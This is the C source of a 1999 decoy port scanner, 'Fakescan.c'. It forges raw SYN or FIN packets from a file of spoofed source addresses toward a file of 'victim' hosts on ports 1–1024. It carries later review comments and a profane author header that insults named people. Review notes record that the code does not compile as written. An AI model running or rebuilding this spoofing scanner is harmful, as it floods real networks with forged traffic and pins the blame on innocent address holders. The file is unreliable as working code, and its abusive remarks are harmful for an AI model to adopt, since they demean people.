/* Fakescan.c (c) 1999 Vortexia / Andrew Alston andrew@idle.za.org
Ok... more crap code from me... thats yes... entirely useless other than
as a proof of case. I wrote this quickly while trying to prove the case
that logging portscans that are syn/fin based is entirely useless.
What the code does:
It reads in a list of hosts to spoof from a spoof host, and sends fake
fin or syn scans to a list of hosts found in the victims file.
Sorry there is no dns resolve on hosts in those files, it was a quick job
while I was bored and I found better things to do while coding it so
I didnt get around to adding it.
The code is once again written for BSD and compiles with no warnings under
fbsd 3.2 - I hate linux - Dont expect a linux port from me, someone else -
feel free to make one
If you wanna use my code, as always, feel free but I expect credit
where credit is due, I.E you use my code, you put my name in your code.
Greets and Shoutouts..
Mithrandi - Thanks for your help
Ultima - For everything you've helped me with in the past
Van - What can I say, HI
TimeWiz - Thanks for help in times past, and for ideas for upcoming projects
Sniper - My partner in crime - You have and always will rock
Opium - HI
Hotmetal - A general greet
DrSmoke - HI
jus - My social engineering partner - lets continue to mindfuck together
OPCODE - Thanks for the help - you rock
gr1p and all the people at b4b0 - Keep rocking guys
To all the people at Forbidden knowledge - Good going - Keep it up
To everyone else on all the networks and channels I hang on,
a general greet and thanks - I couldnt keep doing what I do without you guys.
Fuckoffs, Curses and the likes:
To Sunflower - If you cant handle an insult in a piece of code - and think
thats worth of an akill - GROW UP AND GO FUCK YOURSELF
To Gaspode - May you die a slow and painful death, and may the fleas of
10000 camels infest your armpits
To the person who said coding stuff like this was for script kiddies -
GET A CLUE you know who you are
To anyone else I dont like - FUCK YOU
To anyone else who doesnt like me - FUCK YOU
*/
#define __FAVOR_BSD
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
/*
 * Singly linked list node holding one destination address read from the
 * victim file. main() keeps an empty trailing node (link == NULL) as a
 * sentinel and its traversal loops stop at that node without using it.
 */
struct viclist
{
struct in_addr victim; /* destination address for the forged headers */
struct viclist *link; /* next node, NULL on the trailing sentinel */
};
/*
 * Singly linked list node holding one source address read from the spoof
 * file; these are written into ip_src, so the source of every emitted
 * header is whatever the operator put in that file. Same trailing-sentinel
 * convention as struct viclist.
 */
struct slist
{
struct in_addr spoof; /* address placed in the IP source field */
struct slist *link; /* next node, NULL on the trailing sentinel */
};
/*
 * Entry point.
 *
 * argv[1] selects the TCP flag (an argument starting with 'S' -> TH_SYN,
 * anything else that passes the check below -> TH_FIN). argv[2] is a file
 * of source addresses to forge, argv[3] a file of destination addresses,
 * one dotted-quad per line, no name resolution. For every destination and
 * every forged source, one hand-built IP+TCP header is written to a raw
 * socket per destination port 1..1024.
 *
 * NOTE(review): as written this translation unit does not compile: the
 * usage format string spans two source lines with no continuation, and the
 * inner loop dereferences `tcp`, an identifier that is declared nowhere in
 * this file (the header pointer is named tcphead). Comments only here; the
 * code is left as the author wrote it.
 *
 * Defender's reading (this is the point the header comment argues): the
 * source address is taken verbatim from an operator-supplied file, so the
 * "source" recorded by a SYN/FIN scan detector has no attribution value.
 * The remaining variable fields come from rand() after srand(getpid()) is
 * re-run on every iteration of the port loop, so within one second the
 * sequence and ack numbers are identical for all 1024 ports of a given
 * source/destination pair - a repetitive, easily recognised pattern.
 *
 * Exit status: exit(-1) on a usage error, an unrecognised scan type, or a
 * failed fopen/socket/setsockopt; otherwise returns 1 after the last send.
 */
int
main (int argc, char *argv[])
{
int i = 0; /* destination port counter */
int sock; /* raw socket descriptor */
int on = 1; /* IP_HDRINCL option value */
struct sockaddr_in sockstruct; /* only sin_family, sin_port, sin_addr are ever set; the rest stays uninitialised */
struct ip *iphead; /* view of evilpacket as an IP header */
struct tcphdr *tcphead; /* view of evilpacket past the IP header */
/* Exactly one IP header followed by one TCP header: no options, no payload. */
char evilpacket[sizeof (struct ip) + sizeof (struct tcphdr)];
int seq, ack; /* per-send sequence/ack values, host order */
FILE *victimfile;
FILE *spooffile;
char buffer[256]; /* one input line; fgets is limited to 255 below */
struct viclist *vcur, *vfirst;
struct slist *scur, *sfirst;
/* bzero is a BSD-ism (memset is the portable spelling); zero the whole packet so every unset header field is 0. */
bzero (evilpacket, sizeof (evilpacket));
/*
 * NOTE(review): none of the malloc results in this function are checked,
 * and no node is ever freed - the process relies on exit() for cleanup.
 * Both lists start as a single empty node; each accepted address fills the
 * current node and appends a fresh empty one, so the tail is always an
 * unused sentinel with link == NULL.
 */
vfirst = malloc (sizeof (struct viclist));
vcur = vfirst;
vcur->link = NULL;
sfirst = malloc (sizeof (struct slist));
scur = sfirst;
scur->link = NULL;
if (argc < 4)
{
/* NOTE(review): this string literal is broken across two lines without a backslash or adjacent literals - a compile error as-is. */
printf ("Usage: %s scan_type ((S)yn/(F)in) spoof_file victim_file
Example: %s S spooffile victimfile\n", argv[0], argv[0]);
exit (-1);
}; /* stray ';' after the block (also on several blocks below) - an empty statement */
/* Only the first character of argv[1] is examined; "Syn", "Foo", etc. are all accepted. */
if ((strncmp (argv[1], "S", 1)) && (strncmp (argv[1], "F", 1)))
{
printf ("Scan type not specified\n");
exit (-1);
}
/* NOTE(review): a FILE * is compared with <= 0; the intended test is == NULL. */
if ((spooffile = fopen ((char *) argv[2], "r")) <= 0)
{
perror ("fopen");
exit (-1);
}
else
{
/* Read forged source addresses, one per line. fgets keeps the trailing
 * newline; whether inet_aton tolerates it is platform-dependent - TODO confirm. */
while (fgets (buffer, 255, spooffile))
{
if (!(inet_aton (buffer, &(scur->spoof))))
/* NOTE(review): message says "victim file" but this loop reads the spoof file (copy/paste). */
printf ("Invalid address found in victim file.. ignoring\n");
else
{
/* Address accepted: append the next (sentinel) node and advance to it. */
scur->link = malloc (sizeof (struct slist));
scur = scur->link;
scur->link = NULL;
}
};
bzero (buffer, sizeof (buffer));
};
fclose (spooffile);
/* Echo the accepted source addresses; the loop condition skips the trailing sentinel. */
scur = sfirst;
while (scur->link != NULL)
{
printf ("Found spoof host: %s\n", inet_ntoa (scur->spoof));
scur = scur->link;
};
scur = sfirst;
/* Same FILE* <= 0 comparison as above. */
if ((victimfile = fopen ((char *) argv[3], "r")) <= 0)
{
perror ("fopen");
exit (-1);
}
else
{
/* Read destination addresses with the same parsing and sentinel logic as the spoof list. */
while (fgets (buffer, 255, victimfile))
{
if (!(inet_aton (buffer, &(vcur->victim))))
printf ("Invalid address found in victim file.. ignoring\n");
else
{
vcur->link = malloc (sizeof (struct viclist));
vcur = vcur->link;
vcur->link = NULL;
}
};
bzero (buffer, sizeof (buffer));
};
fclose (victimfile);
/* Echo the accepted destination addresses, again skipping the sentinel. */
vcur = vfirst;
while (vcur->link != NULL)
{
printf ("Found victim host: %s\n", inet_ntoa (vcur->victim));
vcur = vcur->link;
};
vcur = vfirst;
/* Raw IP socket; on BSD this requires superuser privilege, so an unprivileged run fails here with EPERM. */
if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror ("socket");
exit (-1);
}
/* IP_HDRINCL: the IP header in evilpacket is supplied by this program rather than built by the kernel. */
if (setsockopt (sock, IPPROTO_IP, IP_HDRINCL, (char *) &on, sizeof (on)) <
0)
{
perror ("setsockopt");
exit (-1);
}
sockstruct.sin_family = AF_INET;
/* Overlay the header structs on the zeroed buffer. */
iphead = (struct ip *) evilpacket;
tcphead = (struct tcphdr *) (evilpacket + sizeof (struct ip));
/* Fixed IP fields: IHL 5 (20 bytes), IPv4, TTL 255, TCP payload, checksum left 0. */
iphead->ip_hl = 5;
iphead->ip_v = 4;
/* NOTE(review): ip_len is not byte-swapped; which order the kernel expects here is platform-specific - TODO confirm. */
iphead->ip_len = sizeof (struct ip) + sizeof (struct tcphdr);
/* IP ID is the process id for the whole run - constant across every packet sent. */
iphead->ip_id = htons (getpid ());
iphead->ip_ttl = 255;
iphead->ip_p = IPPROTO_TCP;
iphead->ip_sum = 0;
iphead->ip_tos = 0;
iphead->ip_off = 0;
/* Fixed TCP fields: window 512 and the single flag chosen by argv[1]. */
tcphead->th_win = htons (512);
if (!(strncmp (argv[1], "S", 1)))
tcphead->th_flags = TH_SYN;
else
tcphead->th_flags = TH_FIN;
tcphead->th_off = 0x50; /* data offset field as the author set it - TODO confirm against the tcphdr definition in use */
/* Outer loop: one destination per accepted victim node (sentinel excluded). */
while (vcur->link != NULL)
{
iphead->ip_dst = vcur->victim;
sleep (1); /* one-second pause between destinations */
/* Middle loop: one forged source per accepted spoof node. */
while (scur->link != NULL)
{
/* Source port: rand() reduced modulo the current wall-clock second, then truncated to 16 bits by htons. */
tcphead->th_sport = htons (rand () % time (NULL));
/* NOTE(review): `tcp` is undeclared - this line does not compile (tcphead is presumably meant). */
sockstruct.sin_port = tcp->th_sport;
iphead->ip_src = scur->spoof;
sockstruct.sin_addr = scur->spoof;
sleep (1); /* one-second pause between forged sources */
/* Inner loop: destination ports 1..1024 inclusive. */
for (i = 1; i <= 1024; i++)
{
/* NOTE(review): reseeding with the constant pid on every iteration means the two
 * rand() draws below return the same values for every port of this pass. */
srand (getpid ());
seq = rand () % time (NULL);
ack = rand () % time (NULL);
tcphead->th_seq = htonl (seq);
tcphead->th_ack = htonl (ack);
tcphead->th_dport = htons (i);
/* NOTE(review): sendto's return value is ignored; send failures are silent. */
sendto (sock, &evilpacket, sizeof (evilpacket), 0x0,
(struct sockaddr *) &sockstruct, sizeof (sockstruct));
}
scur = scur->link;
}
/* Rewind the source list for the next destination. */
scur = sfirst;
vcur = vcur->link;
}
/* NOTE(review): returns 1 (a failure status by convention) on the normal path; sock is never closed. */
return (1);
}; /* stray ';' at file scope after the function body */